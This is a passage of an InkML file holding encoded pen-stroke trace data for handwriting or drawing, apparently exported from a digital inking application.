3-8-16,2 0-19 0,0 1 5 0,2-2-10 15,0 2 4-15,1-2-20 0,4 3-85 16,-12 2-192-16,9 0 86 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="202570.7214">5000 12962 77 0,'-4'0'82'0,"4"0"0"0,-9 0-1 15,3 0-7-15,-2 1 3 0,2 1-6 16,-2-2 6-16,2 1-10 0,-4-1-8 0,3 0 18 0,-3 0-8 16,3 3-16-16,-4-3-6 0,2 0-1 0,5 2-3 15,-5-2-3-15,2 1-4 0,-1 0 0 0,0-1-8 16,2 2-3-16,-3-2 0 0,5 1-6 16,-4 0 2-16,8-1-4 0,-10 2-1 0,5-2-4 0,0 2-5 15,5-2 3-15,-9 4 1 0,5-3-1 0,4-1 0 16,-6 1-9-16,6-1 6 0,0 0-3 0,-8 2-3 15,8-2 7-15,-2 2-6 0,2-2-1 0,0 10 1 16,0-3 1-16,2 3 0 0,3 2-9 0,-1 2 9 16,1 2-7-16,-1 3 4 0,2 0 0 15,3 6 4-15,1-2-4 0,-3-6-3 0,-2 0-1 0,3 0 8 16,-2-2-4-16,3 0 3 0,-4-6-1 0,-1 2 0 16,1-6-11-16,0 3 13 0,-1-2-9 0,0 0 10 15,0-1-6-15,3 0-1 0,0 1-2 0,-1-3 9 16,3 4 0-16,-2-5-5 0,-1 3 0 0,4-3 7 15,-4 0 0-15,1 0-11 0,-1-2 10 0,2-2-4 16,0 1-4-16,-3-2 6 0,6-4-9 0,-1 2 4 16,-1-6 5-16,-1 4-6 0,1-4 16 0,2-1-13 15,0-3 2-15,-2 2-1 0,-3-2 6 0,3 0-13 16,-4 4 11-16,2-6 0 0,-5 6 0 0,3-1-2 0,-1-1 8 16,-4 6 6-16,3-1 5 0,-2 4 3 15,0-4 0-15,-2 3 0 0,0-2-7 0,-2-2 15 16,-1 3 7-16,-1 1-4 0,0-3-4 0,-4 0-2 15,1 1 4-15,-2 2-1 0,1-2-6 0,0 1-3 0,-1 1 1 16,-1 0-10-16,0 0 7 0,-3 2-6 0,3-1-3 16,6 3 0-16,-7-1-6 0,3 2 4 15,1-1-14-15,1 1-15 0,-1 0-18 0,1 0-25 16,0 1-17-16,-1 1-25 0,0 2-28 0,1-1-12 0,-2 5-110 16,3 2-273-16,-3 1 121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14T15:38:33.5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11528 5906 101 0,'0'0'104'0,"-3"-3"-19"15,3 3-4-15,0 0-8 0,0 0-11 0,0 0 0 16,0 0-14-16,0 0 3 0,0 0-5 0,0 0-2 16,0 17-5-16,3-9 11 0,-6 6-5 0,2-2-4 15,-1 3 3-15,-2 1-8 0,1 3-7 0,-6 5 11 16,3 2 8-16,-2-1-4 0,0 1 2 0,1-8-6 15,1-1-12-15,-1-1 0 0,2-2 0 0,1-2-2 16,2-2-6-16,-2 0-4 0,2 1 1 0,-1-2-1 16,1-3 1-16,1 2-6 0,1-1 2 0,0-4-11 0,-1 4 5 15,1-3 0-15,0-4-4 0,0 4 2 16,0-4 4-16,-1 3 2 0,1-3 0 0,0 0-8 16,3 5 8-16,-3-5-9 0,0 0 8 0,0 0-4 15,0 0-1-15,14-6 4 0,-6-2-1 0,0 0-3 0,1 3-2 16,0-5 2-16,1-1-5 0,1 1 0 0,2-1 5 15,0-1-7-15,-2-2 3 0,1 1 7 16,-2 2-6-16,4-1-1 0,-5 1-1 0,5-2 1 16,-2 1 1-16,2 1-1 0,-1-3-2 0,-1 2-2 0,0 4 4 15,-6 2-8-15,1 2 3 0,-2-1 4 0,-2 1 1 16,3 3-2-16,-3-2-6 0,1 2-2 0,-4 1-1 16,4-2 1-16,-4 2 4 0,0 0-2 15,9 3 5-15,-6 0 1 0,0 2-7 0,-1 3 9 0,0 1-7 16,-2 2 5-16,2 0 1 0,-2 1 0 0,0 0 12 15,2-2-16-15,-2 4 2 0,0-3-5 0,0 0 5 16,0-1 3-16,0-1-6 0,0-2 2 0,1 2-1 16,1-4-1-16,-1 1 0 0,2-1 4 0,-1-1 5 15,2 1 1-15,1-1-3 0,3-2-1 0,-2-2 0 16,4 1-3-16,4-4 5 0,7-3 1 0,-2-1 0 16,9-4-6-16,-2 2 1 0,-3-4-4 0,-4 5 3 15,-5 0-1-15,-1 3-1 0,-6 0 5 0,1 4-7 16,-3-1 9-16,0-1-4 0,0 2-3 0,-1-1-6 15,0-1 1-15,-4 3-2 0,0 0 6 0,5 7 2 16,-5-2-1-16,0 2 6 0,-1 2-8 0,-3 2 9 16,2-2-7-16,0 0 3 0,-2 0-5 0,1 0 1 15,-1 2 13-15,2-1-3 0,1 0-5 0,-4 0-2 16,3 2-13-16,0-3-4 0,1 2-22 0,1-1-21 16,-1-2-22-16,1-1-28 0,-2 0-77 0,1 0-205 15,1-2 90-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="287.9412">12212 6088 123 0,'0'0'124'15,"0"0"-18"-15,0 0-6 0,0 0-19 0,0 0-6 16,6 7-3-16,-6-3-13 0,-4 4 6 0,4 0-12 16,-1 9-15-16,1 1 9 0,-4 2-4 0,-1 3-6 15,5-3-10-15,0-1-13 0,0-1-6 0,-2 0-9 16,4-1 5-16,-2-3-14 0,0-3-8 0,1 0-6 16,2-1 3-16,-2-1-5 0,2-3-10 0,-2 0-6 15,4-1-2-15,-1-2 2 0,0-2 9 0,2 1-8 16,2-4-2-16,2 0-8 0,-2-6-6 0,8-1-42 15,0-1-105-15,-2-1 47 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="647.6558">12540 6051 16 0,'-1'9'96'0,"-3"8"-5"0,-1 2-5 15,-5 8-1-15,1 0-3 0,-2 5-3 16,0 1-4-16,-7 11-10 0,4-1-8 0,1-10-1 16,-3 15 3-16,-4 0-8 0,3-1-6 0,-4 0 3 0,1-2-8 15,1 3 7-15,2-16-15 16,-1 11 1-16,3-11-6 0,-2 3-9 0,4-5 8 0,-1-1-4 0,4-4-3 16,1-8-5-16,3 4 6 0,-1-12 1 15,2 2-4-15,0-2-4 0,1-1 5 0,4-2 6 0,-5-2 7 16,1 0 13-16,3 0 4 0,-4-2-2 0,1 0-9 15,4-2-8-15,-13-2 1 0,6 1-3 0,-2-8-6 16,-3 2-2-16,-3-1 4 0,5-7-10 0,-2 0-2 16,-1-9-4-16,4 6 4 0,-1-6-3 0,4-1-4 15,2-3 2-15,3 1-2 0,2 0-6 0,2 9 2 16,-1-1 4-16,6 1-4 0,-2 0-4 0,3 4-1 16,-2 3-3-16,3 0 10 0,3 0-11 0,-1 1 1 15,6 1-33-15,1 0-33 0,8-1-24 0,0 3-34 16,1 3-106-16,-6 3-257 0,0-2 113 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1878.8105">13143 6002 77 0,'0'0'116'0,"0"0"-4"0,0 0-9 0,-1-3-11 0,1 3-13 16,0 0-3-16,0 0-7 0,0 0-2 16,0 0-7-16,5-3-10 0,-5 3 3 0,0 0-13 15,0 0-2-15,7-1 2 0,-7 1-5 0,7 0 0 16,-7 0-7-16,13-2 2 0,-5 4 0 0,2-2 2 15,3-2-5-15,0 2 1 0,-1 2-2 0,6-4-8 0,-3 2 7 16,3 3-4-16,0-2-6 0,0 1-3 0,0-2 3 16,-1 1-3-16,-2-1 2 0,3 2-6 15,-5-2-5-15,1 0-3 0,-3 3-11 0,1-1-19 0,-2 0-15 16,-1-1-16-16,1 3-14 0,-6-3-15 0,1 0-5 16,-1 1 6-16,-4 3 2 0,0-1 1 0,0-4-51 15,-6 8-147-15,-1 0 66 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2095.2625">13148 6232 11 0,'11'2'104'0,"1"-4"-4"16,1 2-10-16,5-1-8 0,0-1-2 0,1 1-14 16,3 1-5-16,-3-1-9 0,4 1-10 0,-3-2-10 15,1 4-38-15,-1-2-30 0,-3 2-77 0,-3 1-123 16,-1 1 54-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3772.0335">11479 6967 45 0,'-1'-4'132'0,"1"0"2"15,-1-1-4-15,-2 1-2 0,2 0-12 0,1 4-8 16,-1-3-9-16,1 3-9 0,0 0-11 0,0 0-7 16,-3-4-12-16,3 4-2 0,0 0-10 0,0 0 3 15,0 0-13-15,0 0-5 0,0 0 1 0,-6 13-4 16,-1 2 7-16,-2 0 9 0,-5 10-6 0,2 1-1 15,-5-2-8-15,4 3 5 0,-2-1-8 0,2-4-2 16,-1 0-4-16,6-6-5 0,2 1 0 0,-3-1 2 16,0 0 2-16,4 1-6 0,-1-3 3 0,0-3-11 15,3 1 0-15,-1-2-6 0,0 2-13 0,3-3-9 16,-2 2-5-16,-1-2-21 0,3 2-23 0,-1-5-10 16,2-1-11-16,0 1 6 0,0-1-5 0,0-1-8 15,0-4 11-15,0 8 5 0,0-8 0 0,0 0-19 16,0 0-56-16,0 0-170 0,11-18 76 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4389.4279">11486 6901 50 0,'2'9'65'0,"1"3"-1"16,1 4 3-16,0 0-5 0,-3 3-1 0,4 0 6 15,0-1-2-15,-4 0 2 0,1-1-10 0,0 2-7 0,1-4 2 16,1 2-4-16,-1-1-6 0,0-4-6 0,-2 1 6 16,3 0-6-16,0-2 0 0,-2-2-10 0,2 2 0 15,0-1 8-15,1 2-13 0,-3-6-4 16,4 4-2-16,-2-5-1 0,-2 4 0 0,3-4 12 0,-1-1-21 15,0 1 13-15,0 0-2 0,0-1-2 0,1 0-9 16,-4-3 11-16,3 3 0 0,4-2-1 16,-8-2 1-16,9 2-6 0,-6-2 11 0,-3 0-10 0,12-2 5 15,-6 0-4-15,1-2 8 0,-1 1-5 16,1 0-2-16,1-3-7 0,-1-1 2 0,1 1 7 0,-1-5-7 16,2 6-6-16,-3-7 4 0,2 5 2 0,-1-2-2 15,-1 3-6-15,2 1 6 0,-5-2-3 16,1 3 2-16,1-1-10 0,-2 1 1 0,2 0 8 15,-4 2-4-15,6-2 4 0,-5 1-2 0,2 1 2 0,1-2-9 16,-1 1 3-16,0 1-4 0,0 0-2 0,-2-1 0 16,-2 3 6-16,5-3 5 0,-5 3-5 0,4-2 2 15,-4 2-9-15,4-3 1 0,-4 3 6 0,0 0-2 16,5-1 8-16,-5 1-10 0,0 0 3 0,0 0-7 16,0 0-6-16,8 5 19 0,-3-2-9 0,0 2-2 15,-2 2 7-15,-1 1 1 0,2 2 1 0,0-1-1 16,-3 3 1-16,2 5-8 0,-2-2 2 0,2 0 13 15,-2 2-2-15,2-2-3 0,-2-1-3 0,0-2 8 16,-1 0-3-16,5 0-6 0,-4 0 6 0,3-2 3 16,-3-1-4-16,3 1 1 0,-2-2 5 0,0 3-1 15,-1-6-3-15,2 2-7 0,0 0-3 0,-2-4 11 16,1 3-6-16,1-1-4 0,1 0-6 0,-3-3-14 16,0 1-15-16,-1-3-10 0,3 5-10 0,-2-2-6 15,-1-3-12-15,0 0-4 0,3 2-96 0,-3-2-190 16,0 0 85-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4658.6035">12106 7211 5 0,'0'0'108'0,"0"0"-10"0,0 0-3 0,0 0-19 15,0 0 0-15,4 7-8 0,-4-7-12 0,0 7 6 16,0 4-6-16,-3-2-8 0,-1 7 1 0,0 2-3 16,-1-1-5-16,-2 6-1 0,1 3-4 0,1-6-21 15,0 5-13-15,0-4-27 0,4-3-12 0,-2 1-6 0,3-3-19 16,0 2 3-16,0-5-7 0,4-2-49 0,-3 1-123 15,2-5 55-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4954.6025">12388 7331 91 0,'-6'6'131'0,"-5"6"0"0,-4 2-1 15,-5 4-8-15,-1 3-16 0,-2 0 1 0,-1 1-6 0,-3-2-10 16,0 2-6-16,2 2-14 0,0 3-7 0,-3-7 1 16,2 7-6-16,-1-2 3 0,0-3-10 0,-1 3 1 15,-2-1-7-15,5-1-6 0,-1-3 0 0,-1 1-6 16,1-1-4-16,4 1 4 0,-1-4-5 0,1 2-10 15,8-6-2-15,1-1-6 0,-1 1-9 0,4 0-11 16,2-4-21-16,-1 1-23 0,0-2-20 0,3 2-12 16,-2 2-17-16,3-2-22 0,-1 0-101 15,0 0-243-15,4-2 107 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5324.9595">12752 7387 39 0,'0'0'105'16,"0"0"-10"-16,0 0-4 0,0 0-13 0,0 0 0 16,0 0-9-16,0 0 6 0,0 0-24 0,0 0-6 15,0 0-5-15,13 3 4 0,-7-3 21 0,1 3 3 16,2 3-2-16,2-3 8 0,3 0 5 0,-1 1-11 16,8 0 1-16,0 0-3 0,6 1-1 0,0 0-3 15,1 0-12-15,-7-1-1 0,2-2 3 0,5 3-12 16,0-1-2-16,0-3-1 0,4 2-12 0,-10 0 3 15,-2 0 0-15,3 0-7 0,-2 1-3 0,0-1-15 16,-2 0-9-16,-2 3-33 0,-2-3-28 0,-4 0-22 0,0 4-19 16,-1-4-24-16,-1 2-108 0,-4 1-260 15,-1-4 115-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5590.7089">12752 7661 75 0,'28'0'99'0,"2"2"0"0,-1 0-4 15,2-2 0-15,-2 0 2 0,-2-1-5 0,-5 1-7 16,-2 1-1-16,10-1-6 0,-2-1-4 0,1 2-14 0,-2-1-9 15,-8 0 2-15,4 0-5 0,-1 0-6 0,-5 0-8 16,0 0-6-16,-2 2-11 0,-1-1-15 0,-2 1-10 16,0-2-30-16,-3 1-19 0,0-1-8 0,-1 2-27 15,-2-2-83-15,-6 0-189 0,7-3 83 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7132.1317">11436 6451 14 0,'3'6'38'0,"2"-3"0"0,0 2-2 16,0-1-2-16,1-1-6 0,-1 2-6 0,3 0 1 16,2-1-6-16,1 3 1 0,-1-3 7 0,2 1 0 15,1-1 12-15,5 1-11 0,-1-2 4 0,-1 1-4 16,1-1-4-16,3 0-1 0,-2-2-5 15,-4-1 3-15,-1 2-2 0,-1-1 2 0,1-1-5 0,0 0 6 16,-2 0-7-16,1 0 2 0,-4 0-5 0,-1 0 3 16,-1-1 1-16,-6 1 6 0,13-2-3 0,-9 2 2 15,-4 0-1-15,7 0-1 0,-7 0 12 0,0 0 0 16,4-3 4-16,-4 3-7 0,0 0-2 16,0 0 9-16,0 0-11 0,0 0 0 0,0 0-2 0,0 0 2 15,0 0-5-15,0 0 12 0,0 0-20 0,9 0 10 16,-9 0-8-16,0 0-3 0,0 0-3 0,0 0-3 15,0 0 2-15,0 0 5 0,0 0-17 0,0 0 14 16,0 0-2-16,0 0 2 0,0 0 1 0,0 0-15 16,0 0 15-16,0 0-6 0,0 0 3 0,0 0-7 15,0 0 2-15,0 0-7 0,0 0-5 0,0 0-3 16,0 0 1-16,0 0-9 0,0 0 0 0,0 0-8 16,0 0-2-16,0 0-5 0,0 0-18 15,0 0-16-15,0 0-60 0,9 2-143 0,-9-2 64 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8121.4462">11101 8219 8 0,'0'0'68'0,"4"-1"-9"16,-4 1 4-16,11 1 3 0,-11-1-14 0,12-1-5 16,-2 1-2-16,0 1 0 0,2-1 3 0,3 0-3 15,2 3 5-15,3-2-1 0,1 3-5 0,-2-2 2 16,3 2-4-16,6 2-4 0,-1-1-3 0,-7 1-2 16,8 0-18-16,-5-1 16 0,-1-1 2 0,5 2 3 15,-8 0-13-15,9-3 9 0,-2 3 4 0,4-2 12 16,-8-2-6-16,0 2-7 0,-1-1 4 0,0-3 3 15,-1 1-5-15,1 2 0 0,-3-3-9 0,-5 1-1 16,2 0-7-16,-2-1 7 0,-2 0-11 0,1 2 5 16,-1 0-6-16,3-2 2 0,-6 0-1 0,-2-2 4 15,1 4-5-15,-7-2-3 0,11-2 12 0,-11 2-12 16,8 0 4-16,-8 0-11 0,6-2-1 0,-6 2-2 16,7 0 5-16,-7 0 0 0,0 0-1 0,0 0 1 15,0 0-3-15,6 2-1 0,-6-2 5 0,0 0-2 16,0 0-3-16,0 0 1 0,0 0 3 0,0 0-7 15,0 0-4-15,0 0 3 0,0 0-6 0,0 0 1 0,0 0-6 16,0 0-6-16,4 2-1 0,-4-2-6 16,0 0-7-16,0 0 10 0,0 0-12 0,0 0-5 15,0 0-3-15,0 0-9 0,0 0 14 0,0 0-1 16,0 0 2-16,0 0 2 0,0 0 1 0,0 0 5 0,0 0 1 16,0 0 3-16,0 0-9 0,0 0 9 0,0 0 7 15,0 0-1-15,0 0 9 0,0 0 0 16,0 0-18-16,0 0 10 0,0 0 11 0,0 0-4 15,0 0-1-15,0 0-4 0,0 0 14 0,0 0 2 0,0 0 1 16,0 0 1-16,0 0-3 0,0 0-6 0,0 0 5 16,0 0 1-16,0 0-1 0,0 0 4 15,0 0-2-15,0 0-2 0,0 0 0 0,0 0 1 16,0 0-14-16,0 0-2 0,0 0-10 0,0 0-23 0,2 4-20 16,0-2-8-16,-2-2-42 0,1 8-128 0,-1-3 57 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43547.2263">13023 8942 1443 0,'-2'-15'31'15,"0"-2"-13"-15,2 0 10 0,-1 6 9 0,-2 1-4 16,2-1 18-16,1 5 4 0,-1-1-9 0,1 1-4 15,0 0-4-15,-1 3 1 0,1 3 0 0,0-5 0 16,0 5-6-16,0-5-4 0,0 5-3 0,0 0-3 16,-1-5-2-16,1 5-3 0,0 0 1 0,0 0-8 15,0 0 1-15,0 0 5 0,-11 21 0 0,6-9 6 16,-3 5 2-16,0 1-5 0,-3 5 0 0,2 4-3 16,-1 0-4-16,0-2 3 0,2 1-8 0,2 2 7 15,-2 1-5-15,-1-3 0 0,4 0-22 0,-1 2-21 16,1-8-17-16,2-1-27 0,-1 0-11 0,3-2-9 15,0-1-25-15,-2-4-23 0,6-2-14 0,-2 0-102 16,-1-2-281-16,4-5 126 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43942.9723">13653 8364 90 0,'0'0'124'0,"0"0"-15"0,3-4-10 0,-3 4-15 15,0-2-2-15,0 2-13 0,0 0-14 0,-6 13 2 16,-4 2 3-16,-7 8 3 0,-14 16-10 16,3 3 1-16,-3 9-2 0,2 4 0 0,-11 20 6 15,11-23-19-15,3 1 5 0,2-2-8 0,2-1-5 0,2-4-1 16,3-1-1-16,3-10-3 0,-3 11-4 0,6-11-6 16,2 0 8-16,-3 11-1 0,2-12-11 0,3-1 5 15,1 0 1-15,0-4-2 0,0 1 0 0,3-2 0 16,-1-1-2-16,2-7-2 0,-1-1-4 0,1-1-10 15,-2 0-4-15,1-3-18 0,-1-1-14 0,-1-3-17 16,0 1-14-16,-1-1-26 0,-1-2-18 0,-2-2-89 16,-3 1-218-16,1-5 97 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44195.823">13180 9087 111 0,'17'6'122'0,"2"-2"-6"0,0 2-4 15,1 3-9-15,5-3-11 0,2 4-2 0,-8-3-13 16,-1 0-7-16,2 0-8 0,-1-1 5 0,-3 3-13 15,2-5-10-15,-7 1-13 0,2 0-30 0,-3-3-5 16,-1 1-18-16,-1-2-12 0,1-2-14 0,-1-4-31 16,-3 2-83-16,1-4-174 0,2-8 78 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44425.5128">13317 8379 147 0,'-1'-5'154'16,"1"5"-13"-16,-3-3-15 0,3 3-15 0,0 0-5 16,0 0-17-16,0 0-4 0,0 0-12 0,0 0-7 15,0 0-13-15,0 0-7 0,0 0-1 0,0 0-2 16,0 0-8-16,0 0-9 0,10 12-14 0,-6-2-29 15,0 0-29-15,4 5-25 0,-4 4-36 0,0 7-80 16,-3-8-201-16,4 7 89 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44688.125">13910 9000 80 0,'5'1'153'0,"-5"-1"1"0,13-1-5 16,-4 0-2-16,5-1-8 0,-1 0-13 0,6 0-7 16,0-1-15-16,2 1-8 0,-1 1-11 0,-2 0-11 15,1 1-2-15,0 0-8 0,3 2-7 0,-1-2-8 16,0 3-3-16,-3 1-4 0,5-2-1 0,-1 2-7 15,-4 1-9-15,2 1-6 0,-1 0-34 0,-1 2-32 16,0-3-36-16,0 3-25 0,-4 0-18 0,0 4-124 16,-4-4-270-16,-5 2 120 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44984.1832">13836 9147 2 0,'0'0'119'16,"8"3"3"-16,-6 0-9 0,5-3-1 0,-1 2-13 0,0 1-3 15,5 0 5-15,1 1-12 0,1 2-4 0,5 0-2 16,1-2 2-16,3 1-13 0,-3 0-10 0,11 1-2 16,-10 0-6-16,8 0-3 0,-2 1-1 0,-5-1-10 15,6 3-4-15,-5-4-10 0,5 5-30 0,-7-2-35 16,2-1-27-16,-3 0-41 0,0 2-117 0,-3-1-242 16,0-3 107-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="45554.1691">15072 9045 84 0,'-4'-4'130'0,"4"1"9"0,-4 0-5 0,4 3-6 16,-5-6-3-16,1 5-17 0,-1-1-14 0,5 2-14 16,-14 0-6-16,5 0-4 0,-5 3-13 0,1 0-8 0,-4 5-6 15,-4 6 4-15,-3 6-4 0,-4 6-1 0,-11 9 6 16,15-9-7-16,-2 2-3 0,8-4-10 0,4-2 2 15,8-3-3-15,-2-4-9 0,8-2 4 0,0 4-8 16,4 0 4-16,1-2-3 0,4-3 4 0,5 2-4 16,-2-7 1-16,4 1-8 0,5-2 12 0,6-2-3 15,1-3 8-15,1-3 3 0,-1-5 1 0,0 1 11 16,-1-4 3-16,-2-5 5 0,-5-2 1 16,3-3 4-16,-6 0-4 0,-2-2 8 0,-2-1-7 15,-2-4-4-15,-6-2 0 0,-1 2-6 0,-2-2-4 0,-4 0-2 16,-3 0 2-16,-4 1-27 0,-2-1-32 0,-6 1-41 15,-1-1-35-15,-6 4-33 0,-3-1-35 0,-1 5-179 16,-21-3-374-16,14 8 165 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="46314.1884">12084 9522 9 0,'-6'0'100'0,"6"0"-10"15,-7 0-2-15,7 0-1 0,0 0-22 0,0 0-3 16,-9-2-9-16,9 2-6 0,0 0-12 0,0 0-5 16,0 0-4-16,7 9-3 0,3-1 8 0,4 1-3 15,3 3-3-15,7 5-6 0,3 1 11 16,3 0-9-16,-2 3 2 0,4-3 1 0,3 1 3 0,11 5 0 15,0-4-8-15,-13-4 1 0,13 5 0 0,-9-10-4 16,1 1-8-16,10 6 11 0,4-6 3 16,-3 3 12-16,-11-8-2 0,14 1-1 0,-12-2-5 0,1-5 1 15,10 3 7-15,-10-1-3 0,9-3 2 0,-12-1 0 16,2-3-3-16,-2-2 6 0,2-2-2 0,-4 0 0 16,-1-2 5-16,3-1-4 0,-2-3-3 0,0 0 4 15,-1-3 4-15,-2-2-8 0,12-9 1 0,-2-5 0 16,-2 2-9-16,4-3 1 0,-7-7-2 0,4-1-1 15,0-3 0-15,2-3-10 0,15-17 0 0,-18 18 4 16,14-20 1-16,-16 21-3 0,-3-4-4 0,16-21-2 16,-14 24-3-16,-4-3-1 0,22-21 1 0,-24 24-1 15,0 0-1-15,1-4 4 0,2 3-11 0,-10 3 8 16,0 0-8-16,0 2 7 0,2 0-1 0,-10 11-4 16,-3 0 8-16,0 0-3 0,-1 2 0 0,-3 2-3 15,-1 3 2-15,-2 0 3 0,-4 1-3 0,-2-2 6 16,-3 5-6-16,-1-3-3 0,-7 1 1 0,-3-2-4 0,-6 0 4 15,-4 0-2-15,0 1-2 0,-8 1-6 16,-13-7 5-16,-4 6 0 0,-4 0-1 0,-7 2-4 16,0 6 1-16,-5-1 0 0,-1 5 1 0,-27-2 0 15,3 6-5-15,22 5 9 0,-25 8-5 0,3 1 3 16,24 4 1-16,-26 7-1 0,0 8-5 0,4 0 6 16,4 5-2-16,22-6-1 0,-24 10-5 0,28-5 5 15,2 1-3-15,1 5-5 0,-12 22 10 0,24-13-2 16,-12 23-9-16,20-16 3 0,-4 25-4 0,5 2-9 15,9 2-4-15,11-21-14 0,2 29-11 0,3-5-4 0,7 1-30 16,2 6-12-16,4 1-12 0,4 4-97 0,4-1-227 16,-2-2 101-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="60165.8811">9047 12371 23 0,'4'-4'82'0,"1"-1"-1"0,0 1-1 16,2 1-3-16,3-2 2 0,-2-2 2 0,6 4 3 15,0 0-3-15,-1-2-6 0,3-1-8 0,4 1 2 16,1-3 2-16,6 2-7 0,1 4 6 0,0 0-7 15,2-5-10-15,-4 5-7 0,1 3 0 0,-5 0-4 16,7 2-1-16,2 2-4 0,0-2 0 0,2 3-7 16,3 0-6-16,1-1 2 0,1 3-1 0,-1 1-4 15,17 4 8-15,-3-2-6 0,0 1 4 0,0 1-3 16,2 0-1-16,4-2 5 0,3 1 13 0,31 3-1 0,-30-2 4 16,31 2 0-16,3 1-1 0,-6-2-5 0,2 1 5 15,1 1-4-15,0 1-2 0,12-2 4 16,2-1-1-16,7 4-6 0,4 2 0 0,4-3-4 15,5 6 1-15,-2-5-6 0,11 4 4 0,-1-5 2 16,12 4 0-16,8-2-3 0,0 3-4 0,9-1 0 0,7-3 9 16,2 5-7-16,5-6-1 0,2 6 4 0,4-3-10 15,2 1 9-15,8-1 0 0,-1 4-5 0,3-2 1 16,1-3 9-16,-2 4-6 0,2 3 1 16,-10 3-3-16,3-8-3 0,-1 2 6 0,-1 3 3 0,-6 0-13 15,-3-2-1-15,-5 3-4 0,-1 1-6 0,2-1-12 16,-5 3-43-16,-2 2-58 0,-2 0-58 0,-3 5-79 15,-7-4-160-15,1-11-438 0,-14-6 194 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63149.9488">13813 8687 31 0,'0'0'73'16,"-1"-8"-5"-16,1 3-3 0,0 0-5 0,-1 1 5 15,1-1-8-15,1 2-3 0,-1-2 0 0,0 5-1 16,-4-5 8-16,4 5-14 0,0-2 2 0,0 2-6 16,0 0 3-16,0-6-14 0,0 6 7 0,0 0-2 15,0 0 0-15,-1-4-6 0,1 4-6 0,0 0 3 16,0 0-8-16,0 0 0 0,0 0 0 0,0 0-3 15,0 0-6-15,0 0-3 0,-3-4 11 0,3 4-12 16,0 0-3-16,0 0 7 0,0 0-12 0,0 0 10 16,0 0-4-16,0 0 0 0,0 0-7 0,0 0 9 15,0 0-6-15,0 0 2 0,0 0 2 0,0 0-4 16,0 0 5-16,0 0-8 0,0 0-3 0,0 0 4 16,0 0 3-16,0 0-8 0,0 0 5 0,0 0 8 15,0 0-4-15,0 0 2 0,0 0-2 0,0 0-9 16,0 0 6-16,0 0 4 0,0 0-2 0,0 0-2 15,0 0 7-15,0 0 2 0,0 0 0 0,0 0 1 16,0 0-4-16,0 0 12 0,0 0-11 0,0 0 5 16,0 0 14-16,0 0-12 0,0 0 0 0,0 0 3 15,0 0-5-15,0 0 11 0,0 0-4 0,0 0-2 0,0 0 6 16,1-4-7-16,-1 4-5 0,0 0 0 16,0 0 0-16,0 0 1 0,-1-5-4 0,1 5 0 15,0 0-4-15,0 0 7 0,0-5-7 0,0 5 3 0,0 0 2 16,0 0-6-16,1-3 0 0,-1 3 2 0,0 0 0 15,2-5 0-15,-2 5 1 0,0 0-8 0,0 0 2 16,-2-5-1-16,2 5 6 0,0 0-4 0,-1-4-5 16,1 4 6-16,0-4 1 0,0 4 5 0,0 0-4 15,0-6 0-15,0 6-3 0,0 0-7 0,0-4 7 16,0 4-25-16,0 0-4 0,0 0-25 0,0-5-7 16,0 5-18-16,0 0 1 0,0 0-7 0,0 0-3 15,0 0-2-15,0 0-1 0,0 0 4 0,0 0 0 16,0 0-46-16,0 0-143 0,8 11 63 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63830.4042">13831 8688 30 0,'0'-5'115'0,"1"0"-7"0,1 3-2 16,-2 2-3-16,0-8-9 0,1 5-6 16,-1 3-3-16,-3-6-4 0,3 6-7 0,-1-5-7 0,0 2-2 15,1 3-10-15,-5-4 8 0,5 4-18 0,-13 0-11 16,13 0-2-16,-17 3-3 0,6 1-4 0,-1 1 7 16,-3 3-10-16,-2-1-5 0,7 1 0 0,-3 0-5 15,4-2 2-15,-2 3-2 0,3-2-4 0,0 2 3 16,1-1 1-16,0-1-1 0,5-1-10 0,-3 1 5 15,1 1-5-15,3-2 3 0,-1-1-4 0,1 1 2 16,2 1 1-16,2-4 0 0,-3 2-2 0,5 1 0 16,1-2-1-16,-3-2-11 0,2 0 12 0,0-1 5 15,2 1-2-15,0-2 3 0,2 0 1 0,-4-2 11 16,3 1-2-16,2-2 12 0,-1 0 9 0,-4 3-1 16,3-2 5-16,-4-2 4 0,2 3 5 0,-6 1-4 15,5-3-2-15,-5 3-8 0,7 0-1 0,-7 0-13 16,0 0-1-16,0 0-10 0,5 4 7 0,-4 1-3 15,2 2 13-15,-1 4 18 0,2 4-3 0,0 4-4 16,1 6-5-16,-1 2 0 0,0 5-2 0,-1 1-12 16,0 14-51-16,-3 4-74 0,0 8-89 0,-10-3-141 15,-3-3-360-15,0-7 160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14T15:39:57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16719 3528 60 0,'3'-11'114'0,"-1"0"2"0,2 0-1 0,-3 0-13 16,2 2 3-16,2 1 6 0,-3 0-2 0,0 2 0 16,-2 1 9-16,2-1-9 0,1 2-10 0,-2 0-6 